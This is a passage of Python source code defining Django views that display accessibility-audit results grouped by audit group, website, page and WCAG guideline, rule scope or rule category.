from pageResults.models import PageGuidelineResult
from pageResults.models import PageRuleScopeResult
from rulesets.models import Ruleset
from ruleCategories.models import RuleCategory
from wcag20.models import Guideline
from rules.models import RuleScope
from contacts.models import Announcement
from itertools import chain
from django.urls import reverse_lazy, reverse
from django.contrib.auth.mixins import LoginRequiredMixin
from audits.resultNavigationMixin import ResultNavigationMixin
# ==============================================================
#
# Audit Group Report Views
#
# ==============================================================
class GroupResultsView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_results.html'
def get_context_data(self, **kwargs):
context = super(GroupResultsView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
ar = AuditResult.objects.get(slug=result_slug)
agrs = ar.group_results.all()
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping)
self.result_nav.create_result_navigation()
for agr in agrs:
agr.title = agr.get_title()
agr.href = reverse('group_results_audit_group', args=[result_slug, rule_grouping, agr.slug])
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['audit_group_results'] = agrs
return context
# All rule views
# ==============
class GroupResultsAuditGroupView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_results_audit_group.html'
def get_context_data(self, **kwargs):
context = super(GroupResultsAuditGroupView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
audit_group_slug = kwargs['audit_group_slug']
ar = AuditResult.objects.get(slug=result_slug)
agr = ar.group_results.get(slug=audit_group_slug)
ag2rs = agr.group2_results.all()
wsrs = agr.ws_results.filter(status='C')
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping)
self.result_nav.set_audit_groups(audit_group_slug)
self.result_nav.create_result_navigation()
for ag2r in ag2rs:
ag2r.title = ag2r.get_title
ag2r.website_count = ag2r.get_website_count()
ag2r.page_count = ag2r.get_page_count()
ag2r.href = reverse('group_results_audit_group_audit_group2', args=[result_slug, rule_grouping, audit_group_slug, ag2r.slug])
for wsr in wsrs:
wsr.title = wsr.title
wsr.href = reverse('group_results_audit_group_website', args=[result_slug, rule_grouping, audit_group_slug, wsr.slug])
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['audit_result'] = ar
context['audit_group_result'] = agr
context['audit_group_results'] = ag2rs
context['website_results'] = wsrs
return context
# ======================
# All rule group 2 views
# ======================
class GroupResultsAuditGroupAuditGroup2View(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_results_audit_group_audit_group2.html'
def get_context_data(self, **kwargs):
context = super(GroupResultsAuditGroupAuditGroup2View, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
audit_group_slug = kwargs['audit_group_slug']
audit_group2_slug = kwargs['audit_group2_slug']
ar = AuditResult.objects.get(slug=result_slug)
agr = ar.group_results.get(slug=audit_group_slug)
ag2r = agr.group2_results.get(slug=audit_group2_slug)
wsrs = ag2r.ws_results.filter(status='C')
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping)
self.result_nav.set_audit_groups(audit_group_slug, audit_group2_slug)
self.result_nav.create_result_navigation()
for wsr in wsrs:
wsr.title = wsr.title
wsr.href = reverse('group_results_audit_group_audit_group2_website', args=[result_slug, rule_grouping, audit_group_slug, audit_group2_slug, wsr.slug])
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['audit_group_slug'] = audit_group_slug
context['audit_group2_slug'] = audit_group2_slug
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['audit_result'] = ar
context['audit_group_result'] = agr
context['audit_group2_result'] = ag2r
context['website_results'] = wsrs
return context
class GroupResultsAuditGroupAuditGroup2WebsiteView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_results_audit_group_audit_group2_website.html'
def get_context_data(self, **kwargs):
context = super(GroupResultsAuditGroupAuditGroup2WebsiteView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
audit_group_slug = kwargs['audit_group_slug']
audit_group2_slug = kwargs['audit_group2_slug']
website_slug = kwargs['website_slug']
ar = AuditResult.objects.get(slug=result_slug)
agr = ar.group_results.get(slug=audit_group_slug)
ag2r = agr.group2_results.get(slug=audit_group2_slug)
wsrs = ag2r.ws_results.filter(status='C')
wsr = wsrs.get(slug=website_slug)
prs = wsr.page_all_results.all()
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping)
self.result_nav.set_audit_groups(audit_group_slug, audit_group2_slug)
self.result_nav.set_website_page(website_slug)
self.result_nav.create_result_navigation()
for pr in prs:
pr.page_num = pr.page_number
pr.title = pr.get_title()
pr.href = reverse('group_results_audit_group_audit_group2_website_page', args=[result_slug, rule_grouping, audit_group_slug, audit_group2_slug, website_slug, pr.page_number])
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['audit_group_slug'] = audit_group_slug
context['audit_group2_slug'] = audit_group2_slug
context['website_slug'] = website_slug
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['audit_result'] = ar
context['audit_group_result'] = agr
context['audit_group2_result'] = ag2r
context['website_results'] = wsrs
context['website_result'] = wsr
context['page_results'] = prs
return context
class GroupResultsAuditGroupAuditGroup2WebsitePageView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_results_audit_group_audit_group2_website_page.html'
def get_context_data(self, **kwargs):
context = super(GroupResultsAuditGroupAuditGroup2WebsitePageView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
audit_group_slug = kwargs['audit_group_slug']
audit_group2_slug = kwargs['audit_group2_slug']
website_slug = kwargs['website_slug']
page_num = kwargs['page_num']
ar = AuditResult.objects.get(slug=result_slug)
agr = ar.group_results.get(slug=audit_group_slug)
ag2r = agr.group2_results.get(slug=audit_group2_slug)
wsrs = ag2r.ws_results.filter(status='C')
wsr = wsrs.get(slug=website_slug)
pr = wsr.page_all_results.get(page_number=page_num)
prrs = pr.page_rule_results.all()
for prr in prrs:
prr.title = prr.rule.summary_html
prr.href = reverse('group_results_audit_group_audit_group2_website_page_rule', args=[result_slug, rule_grouping, audit_group_slug, audit_group2_slug, website_slug, page_num, prr.slug])
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping)
self.result_nav.set_audit_groups(audit_group_slug, audit_group2_slug)
self.result_nav.set_website_page(website_slug, page_num, wsr.page_count)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['audit_group_slug'] = audit_group_slug
context['audit_group2_slug'] = audit_group2_slug
context['website_slug'] = website_slug
context['page_num'] = page_num
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['audit_result'] = ar
context['audit_group_result'] = agr
context['audit_group2_result'] = ag2r
context['website_results'] = wsrs
context['website_result'] = wsr
context['page_result'] = pr
context['page_rule_results'] = prrs
return context
class GroupResultsAuditGroupAuditGroup2WebsitePageRuleView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_results_audit_group_audit_group2_website_page_rule.html'
def get_context_data(self, **kwargs):
context = super(GroupResultsAuditGroupAuditGroup2WebsitePageRuleView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
audit_group_slug = kwargs['audit_group_slug']
audit_group2_slug = kwargs['audit_group2_slug']
website_slug = kwargs['website_slug']
page_num = kwargs['page_num']
rule_slug = kwargs['rule_slug']
ar = AuditResult.objects.get(slug=result_slug)
agr = ar.group_results.get(slug=audit_group_slug)
ag2r = agr.group2_results.get(slug=audit_group2_slug)
wsrs = ag2r.ws_results.filter(status='C')
wsr = wsrs.get(slug=website_slug)
pr = wsr.page_all_results.get(page_number=page_num)
prr = pr.page_rule_results.get(slug=rule_slug)
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping)
self.result_nav.set_audit_groups(audit_group_slug, audit_group2_slug)
self.result_nav.set_website_page(website_slug, page_num, wsr.page_count)
self.result_nav.set_rule(rule_slug)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['audit_group_slug'] = audit_group_slug
context['audit_group2_slug'] = audit_group2_slug
context['website_slug'] = website_slug
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['audit_result'] = ar
context['audit_group_result'] = agr
context['audit_group2_result'] = ag2r
context['website_result'] = wsr
context['page_result'] = pr
context['page_rule_result'] = prr
context['rule'] = prr.rule
return context
# ======================
# All rule website views
# ======================
class GroupResultsAuditGroupWebsiteView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_results_audit_group_website.html'
def get_context_data(self, **kwargs):
context = super(GroupResultsAuditGroupWebsiteView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
audit_group_slug = kwargs['audit_group_slug']
website_slug = kwargs['website_slug']
ar = AuditResult.objects.get(slug=result_slug)
agr = ar.group_results.get(slug=audit_group_slug)
wsrs = agr.ws_results.filter(status='C')
wsr = wsrs.get(slug=website_slug)
prs = wsr.page_all_results.all()
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping)
self.result_nav.set_audit_groups(audit_group_slug)
self.result_nav.set_website_page(website_slug)
self.result_nav.create_result_navigation()
for pr in prs:
pr.page_num = pr.page_number
pr.title = pr.get_title()
pr.href = reverse('group_results_audit_group_website_page', args=[result_slug, rule_grouping, audit_group_slug, website_slug, pr.page_number])
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['audit_group_slug'] = audit_group_slug
context['website_slug'] = website_slug
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['audit_result'] = ar
context['audit_group_result'] = agr
context['website_results'] = wsrs
context['website_result'] = wsr
context['page_results'] = prs
return context
class GroupResultsAuditGroupWebsitePageView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_results_audit_group_website_page.html'
def get_context_data(self, **kwargs):
context = super(GroupResultsAuditGroupWebsitePageView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
audit_group_slug = kwargs['audit_group_slug']
website_slug = kwargs['website_slug']
page_num = kwargs['page_num']
ar = AuditResult.objects.get(slug=result_slug)
agr = ar.group_results.get(slug=audit_group_slug)
wsrs = agr.ws_results.filter(status='C')
wsr = wsrs.get(slug=website_slug)
pr = wsr.page_all_results.get(page_number=page_num)
prrs = pr.page_rule_results.all()
for prr in prrs:
prr.title = prr.rule.summary_html
prr.href = reverse('group_results_audit_group_website_page_rule', args=[result_slug, rule_grouping, audit_group_slug, website_slug, page_num, prr.slug])
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping)
self.result_nav.set_audit_groups(audit_group_slug)
self.result_nav.set_website_page(website_slug, page_num, wsr.page_count)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['audit_group_slug'] = audit_group_slug
context['website_slug'] = website_slug
context['page_num'] = page_num
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['audit_result'] = ar
context['audit_group_result'] = agr
context['website_results'] = wsrs
context['website_result'] = wsr
context['page_result'] = pr
context['page_rule_results'] = prrs
return context
class GroupResultsAuditGroupWebsitePageRuleView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_results_audit_group_website_page_rule.html'
def get_context_data(self, **kwargs):
context = super(GroupResultsAuditGroupWebsitePageRuleView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
audit_group_slug = kwargs['audit_group_slug']
website_slug = kwargs['website_slug']
page_num = kwargs['page_num']
rule_slug = kwargs['rule_slug']
ar = AuditResult.objects.get(slug=result_slug)
agr = ar.group_results.get(slug=audit_group_slug)
wsrs = agr.ws_results.filter(status='C')
wsr = wsrs.get(slug=website_slug)
pr = wsr.page_all_results.get(page_number=page_num)
prr = pr.page_rule_results.get(slug=rule_slug)
r = prr.rule
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping)
self.result_nav.set_audit_groups(audit_group_slug)
self.result_nav.set_website_page(website_slug, page_num, wsr.page_count)
self.result_nav.set_rule(rule_slug)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['audit_group_slug'] = audit_group_slug
context['website_slug'] = website_slug
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['audit_result'] = ar
context['audit_group_result'] = agr
context['website_results'] = wsrs
context['website_result'] = wsr
context['page_result'] = pr
context['page_rule_result'] = prr
context['rule'] = r
return context
# ================
# Rule Group Views
# ================
class GroupRuleGroupResultsView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_rule_group_results.html'
def get_context_data(self, **kwargs):
context = super(GroupRuleGroupResultsView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
rule_group_slug = kwargs['rule_group_slug']
ar = AuditResult.objects.get(slug=result_slug)
if rule_grouping == 'gl':
argr = AuditGuidelineResult.objects.get(audit_result=ar, slug=rule_group_slug)
agrs = AuditGroupGuidelineResult.objects.filter(group_result__audit_result=ar, slug=rule_group_slug)
rule_group = Guideline.objects.get(slug=rule_group_slug)
else:
if rule_grouping == 'rs':
argr = AuditRuleScopeResult.objects.get(audit_result=ar, slug=rule_group_slug)
agrs = AuditGroupRuleScopeResult.objects.filter(group_result__audit_result=ar, slug=rule_group_slug)
rule_group = RuleScope.objects.get(slug=rule_group_slug)
else:
argr = AuditRuleCategoryResult.objects.get(audit_result=ar, slug=rule_group_slug)
agrs = AuditGroupRuleCategoryResult.objects.filter(group_result__audit_result=ar, slug=rule_group_slug)
rule_group = RuleCategory.objects.get(slug=rule_group_slug)
for agr in agrs:
agr.title = agr.group_result.get_title()
agr.href = reverse('group_rule_group_results_audit_group', args=[result_slug, rule_grouping, rule_group_slug, agr.group_result.slug])
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping, rule_group_slug)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['rule_group_slug'] = rule_group_slug
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['audit_result'] = ar
context['rule_group'] = rule_group
context['rule_group_result'] = argr
context['audit_group_results'] = agrs
return context
class GroupRuleGroupResultsAuditGroupView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_rule_group_results_audit_group.html'
def get_context_data(self, **kwargs):
context = super(GroupRuleGroupResultsAuditGroupView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
rule_group_slug = kwargs['rule_group_slug']
audit_group_slug = kwargs['audit_group_slug']
ar = AuditResult.objects.get(slug=result_slug)
agr = AuditGroupResult.objects.get(audit_result=ar, slug=audit_group_slug)
if rule_grouping == 'gl':
agrgr = AuditGroupGuidelineResult.objects.get(group_result=agr, slug=rule_group_slug)
ag2rgrs = AuditGroup2GuidelineResult.objects.filter(group2_result__group_result=agr, slug=rule_group_slug)
wsrgrs = WebsiteGuidelineResult.objects.filter(ws_report__group_result=agr, slug=rule_group_slug)
rule_group = Guideline.objects.get(slug=rule_group_slug)
else:
if rule_grouping == 'rs':
agrgr = AuditGroupRuleScopeResult.objects.get(group_result=agr, slug=rule_group_slug)
ag2rgrs = AuditGroup2RuleScopeResult.objects.filter(group2_result__group_result=agr, slug=rule_group_slug)
wsrgrs = WebsiteRuleScopeResult.objects.filter(ws_report__group_result=agr, slug=rule_group_slug)
rule_group = RuleScope.objects.get(slug=rule_group_slug)
else:
rule_grouping == 'rc'
agrgr = AuditGroupRuleCategoryResult.objects.get(group_result=agr, slug=rule_group_slug)
ag2rgrs = AuditGroup2RuleCategoryResult.objects.filter(group2_result__group_result=agr, slug=rule_group_slug)
wsrgrs = WebsiteRuleCategoryResult.objects.filter(ws_report__group_result=agr, slug=rule_group_slug)
rule_group = RuleCategory.objects.get(slug=rule_group_slug)
for ag2rgr in ag2rgrs:
ag2rgr.title = ag2rgr.get_title()
ag2rgr.website_count = ag2rgr.get_website_count()
ag2rgr.page_count = ag2rgr.get_page_count()
ag2rgr.href = reverse('group_rule_group_results_audit_group_audit_group2', args=[result_slug, rule_grouping, rule_group_slug, audit_group_slug, ag2rgr.group2_result.slug])
for wsrgr in wsrgrs:
wsrgr.title = wsrgr.get_title()
wsrgr.group_title = wsrgr.get_group_title()
wsrgr.group2_title = wsrgr.get_group2_title()
wsrgr.page_count = wsrgr.get_page_count()
wsrgr.href = reverse('group_rule_group_results_audit_group_website', args=[result_slug, rule_grouping, rule_group_slug, audit_group_slug, wsrgr.ws_report.slug])
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping, rule_group_slug)
self.result_nav.set_audit_groups(audit_group_slug)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['rule_group_slug'] = rule_group_slug
context['audit_group_slug'] = audit_group_slug
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['rule_group'] = rule_group
context['audit_group_results'] = ag2rgrs
context['audit_group_result'] = agrgr
context['website_results'] = wsrgrs
return context
# =================================
# Rule grouping audit group 2 views
# =================================
class GroupRuleGroupResultsAuditGroupAuditGroup2View(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_rule_group_results_audit_group_audit_group2.html'
def get_context_data(self, **kwargs):
context = super(GroupRuleGroupResultsAuditGroupAuditGroup2View, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
rule_group_slug = kwargs['rule_group_slug']
audit_group_slug = kwargs['audit_group_slug']
audit_group2_slug = kwargs['audit_group2_slug']
ar = AuditResult.objects.get(slug=result_slug)
agr = AuditGroupResult.objects.get(audit_result=ar, slug=audit_group_slug)
ag2r = AuditGroup2Result.objects.get(group_result=agr, slug=audit_group2_slug)
if rule_grouping == 'gl':
ag2rgr = AuditGroup2GuidelineResult.objects.get(group2_result=ag2r, slug=rule_group_slug)
wsrgrs = WebsiteGuidelineResult.objects.filter(ws_report__group2_result=ag2r, slug=rule_group_slug)
rule_group = Guideline.objects.get(slug=rule_group_slug)
else:
if rule_grouping == 'rs':
ag2rgr = AuditGroup2RuleScopeResult.objects.get(group2_result=ag2r, slug=rule_group_slug)
wsrgrs = WebsiteRuleScopeResult.objects.filter(ws_report__group2_result=ag2r, slug=rule_group_slug)
rule_group = RuleScope.objects.get(slug=rule_group_slug)
else:
rule_grouping == 'rc'
ag2rgr = AuditGroup2RuleCategoryResult.objects.get(group2_result=ag2r, slug=rule_group_slug)
wsrgrs = WebsiteRuleCategoryResult.objects.filter(ws_report__group2_result=ag2r, slug=rule_group_slug)
rule_group = RuleCategory.objects.get(slug=rule_group_slug)
for wsrgr in wsrgrs:
wsrgr.title = wsrgr.get_title()
wsrgr.group_title = wsrgr.get_group_title()
wsrgr.group2_title = wsrgr.get_group2_title()
wsrgr.page_count = wsrgr.get_page_count()
wsrgr.href = reverse('group_rule_group_results_audit_group_audit_group2_website', args=[result_slug, rule_grouping, rule_group_slug, audit_group_slug, audit_group2_slug, wsrgr.ws_report.slug])
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping, rule_group_slug)
self.result_nav.set_audit_groups(audit_group_slug, audit_group2_slug)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['rule_group_slug'] = rule_group_slug
context['audit_group_slug'] = audit_group_slug
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['rule_group'] = rule_group
context['audit_group_result'] = agr
context['audit_group2_result'] = ag2rgr
context['website_results'] = wsrgrs
return context
class GroupRuleGroupResultsAuditGroupAuditGroup2WebsiteView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_rule_group_results_audit_group_audit_group2_website.html'
def get_context_data(self, **kwargs):
context = super(GroupRuleGroupResultsAuditGroupAuditGroup2WebsiteView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
rule_group_slug = kwargs['rule_group_slug']
audit_group_slug = kwargs['audit_group_slug']
audit_group2_slug = kwargs['audit_group2_slug']
website_slug = kwargs['website_slug']
ar = AuditResult.objects.get(slug=result_slug)
agr = AuditGroupResult.objects.get(audit_result=ar, slug=audit_group_slug)
ag2r = AuditGroup2Result.objects.get(group_result=agr, slug=audit_group2_slug)
wsr = WebsiteResult.objects.get(group_result=agr, slug=website_slug)
if rule_grouping == 'gl':
wsrgr = wsr.ws_gl_results.get(slug=rule_group_slug)
pgrgrs = wsrgr.page_gl_results.all()
rule_group = Guideline.objects.get(slug=rule_group_slug)
else:
if rule_grouping == 'rs':
wsrgr = wsr.ws_rs_results.get(slug=rule_group_slug)
pgrgrs = wsrgr.page_rs_results.all()
rule_group = RuleScope.objects.get(slug=rule_group_slug)
else:
rule_grouping == 'rc'
wsrgr = wsr.ws_rc_results.get(slug=rule_group_slug)
pgrgrs = wsrgr.page_rc_results.all()
rule_group = RuleCategory.objects.get(slug=rule_group_slug)
for pgrgr in pgrgrs:
pgrgr.title = pgrgr.get_title()
pgrgr.page_num = pgrgr.get_page_number()
pgrgr.href = reverse('group_rule_group_results_audit_group_audit_group2_website_page', args=[result_slug, rule_grouping, rule_group_slug, audit_group_slug, audit_group2_slug, website_slug, pgrgr.get_page_number()])
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping, rule_group_slug)
self.result_nav.set_audit_groups(audit_group_slug, audit_group2_slug)
self.result_nav.set_website_page(website_slug)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['rule_group_slug'] = rule_group_slug
context['audit_group_slug'] = audit_group_slug
context['audit_group2_slug'] = audit_group2_slug
context['website_slug'] = website_slug
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['rule_group'] = rule_group
context['audit_group_result'] = agr
context['audit_group2_result'] = ag2r
context['website_result'] = wsr
context['page_results'] = pgrgrs
return context
class GroupRuleGroupResultsAuditGroupAuditGroup2WebsitePageView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_rule_group_results_audit_group_audit_group2_website_page.html'
def get_context_data(self, **kwargs):
context = super(GroupRuleGroupResultsAuditGroupAuditGroup2WebsitePageView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
rule_group_slug = kwargs['rule_group_slug']
audit_group_slug = kwargs['audit_group_slug']
audit_group2_slug = kwargs['audit_group2_slug']
website_slug = kwargs['website_slug']
page_num = kwargs['page_num']
ar = AuditResult.objects.get(slug=result_slug)
agr = AuditGroupResult.objects.get(audit_result=ar, slug=audit_group_slug)
ag2r = AuditGroup2Result.objects.get(group_result=agr, slug=audit_group2_slug)
wsr = WebsiteResult.objects.get(group_result=agr, slug=website_slug)
pgr = PageResult.objects.get(ws_report=wsr, page_number=page_num)
if rule_grouping == 'gl':
pgrg = pgr.page_gl_results.get(slug=rule_group_slug)
pgrrs = pgrg.page_rule_results.all()
rule_group = Guideline.objects.get(slug=rule_group_slug)
else:
if rule_grouping == 'rs':
pgrg = pgr.page_rs_results.get(slug=rule_group_slug)
pgrrs = pgrg.page_rule_results.all()
rule_group = RuleScope.objects.get(slug=rule_group_slug)
else:
rule_grouping == 'rc'
pgrg = pgr.page_rc_results.get(slug=rule_group_slug)
pgrrs = pgrg.page_rule_results.all()
rule_group = RuleCategory.objects.get(slug=rule_group_slug)
for pgrr in pgrrs:
pgrr.title = pgrr.rule.summary_html
pgrr.href = reverse('group_rule_group_results_audit_group_audit_group2_website_page_rule', args=[result_slug, rule_grouping, rule_group_slug, audit_group_slug, audit_group2_slug, website_slug, page_num, pgrr.slug])
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping, rule_group_slug)
self.result_nav.set_audit_groups(audit_group_slug, audit_group2_slug)
self.result_nav.set_website_page(website_slug, page_num)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['rule_group_slug'] = rule_group_slug
context['audit_group_slug'] = audit_group_slug
context['audit_group2_slug'] = audit_group2_slug
context['website_slug'] = website_slug
context['page_num'] = page_num
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['rule_group'] = rule_group
context['audit_group_result'] = agr
context['audit_group2_result'] = ag2r
context['website_result'] = wsr
context['page_result'] = pgr
context['page_rule_results'] = pgrrs
return context
class GroupRuleGroupResultsAuditGroupAuditGroup2WebsitePageRuleView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_rule_group_results_audit_group_audit_group2_website_page_rule.html'
def get_context_data(self, **kwargs):
context = super(GroupRuleGroupResultsAuditGroupAuditGroup2WebsitePageRuleView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
rule_group_slug = kwargs['rule_group_slug']
audit_group_slug = kwargs['audit_group_slug']
audit_group2_slug = kwargs['audit_group2_slug']
website_slug = kwargs['website_slug']
page_num = kwargs['page_num']
rule_slug = kwargs['rule_slug']
ar = AuditResult.objects.get(slug=result_slug)
agr = ar.group_results.get(slug=audit_group_slug)
ag2r = agr.group2_results.get(slug=audit_group2_slug)
wsrs = ag2r.ws_results.filter(status='C')
wsr = wsrs.get(slug=website_slug)
pr = wsr.page_all_results.get(page_number=page_num)
prr = pr.page_rule_results.get(slug=rule_slug)
r = prr.rule
if rule_grouping == 'gl':
rule_group = Guideline.objects.get(slug=rule_group_slug)
else:
if rule_grouping == 'rs':
rule_group = RuleScope.objects.get(slug=rule_group_slug)
else:
rule_grouping == 'rc'
rule_group = RuleCategory.objects.get(slug=rule_group_slug)
# Setup report navigation
self.result_nav.set_audit_result(ar, 'group', self.request.path)
self.result_nav.set_rule_grouping(rule_grouping, rule_group_slug)
self.result_nav.set_audit_groups(audit_group_slug, audit_group2_slug)
self.result_nav.set_website_page(website_slug, page_num, wsr.page_count)
self.result_nav.set_rule(rule_slug)
self.result_nav.create_result_navigation()
# slugs used for urls
context['audit_slug'] = ar.audit.slug
context['result_slug'] = result_slug
context['rule_grouping'] = rule_grouping
context['audit_group_slug'] = audit_group_slug
context['audit_group2_slug'] = audit_group2_slug
context['website_slug'] = website_slug
# objects for rendering content
context['audit'] = ar.audit
context['audit_result'] = ar
context['rule_group'] = rule_group
context['audit_result'] = ar
context['audit_group_result'] = agr
context['audit_group2_result'] = ag2r
context['website_results'] = wsrs
context['website_result'] = wsr
context['page_result'] = pr
context['page_rule_result'] = prr
context['rule'] = r
return context
# ===========================
# Rule grouping website views
# ===========================
class GroupRuleGroupResultsAuditGroupWebsiteView(ResultNavigationMixin, TemplateView):
template_name = 'auditGroupResults/group_rule_group_results_audit_group_website.html'
def get_context_data(self, **kwargs):
context = super(GroupRuleGroupResultsAuditGroupWebsiteView, self).get_context_data(**kwargs)
result_slug = kwargs['result_slug']
rule_grouping = kwargs['rule_grouping']
rule_group_slug = kwargs['rule_group_slug']
audit_group_slug = kwargs['audit_group_slug']
website_slug = kwargs['website_slug']
ar = AuditResult.objects.get(slug=result_slug)
agr = AuditGroupResult.objects.get(audit_result=ar, slug=audit_group_slug)
wsr = WebsiteResult.objects.get(group_result=agr, slug=website_slug)
if rule_grouping == 'gl':
wsrgr = wsr.ws_gl_results.get(slug=rule_group_slug)
pgrgrs = wsrgr.page_gl_results.all()
rule_group = Guideline.objects.get(slug=rule_group_slug)
else:
if rule_grouping == 'rs':
wsrgr = wsr.ws_rs_results.get(slug=rule_group_slug)
pgrgrs = wsrgr.page_rs_results.all()
rule_group = RuleScope.objects.get(slug=rule_group_slug)
else:
rule_grouping == 'rc'
wsrgr = wsr.ws_rc_results.get(slug=rule_group_slug)
pgrgrs = wsrgr.page_rc_results.all()
rule_group = RuleCategory.objects.get(slug=rule_group_slug)
for pgrgr in pgrgrs:
pgrgr.title = pgrgr.get_title()
pgrgr.page_num = pgrgr.get_page_number()
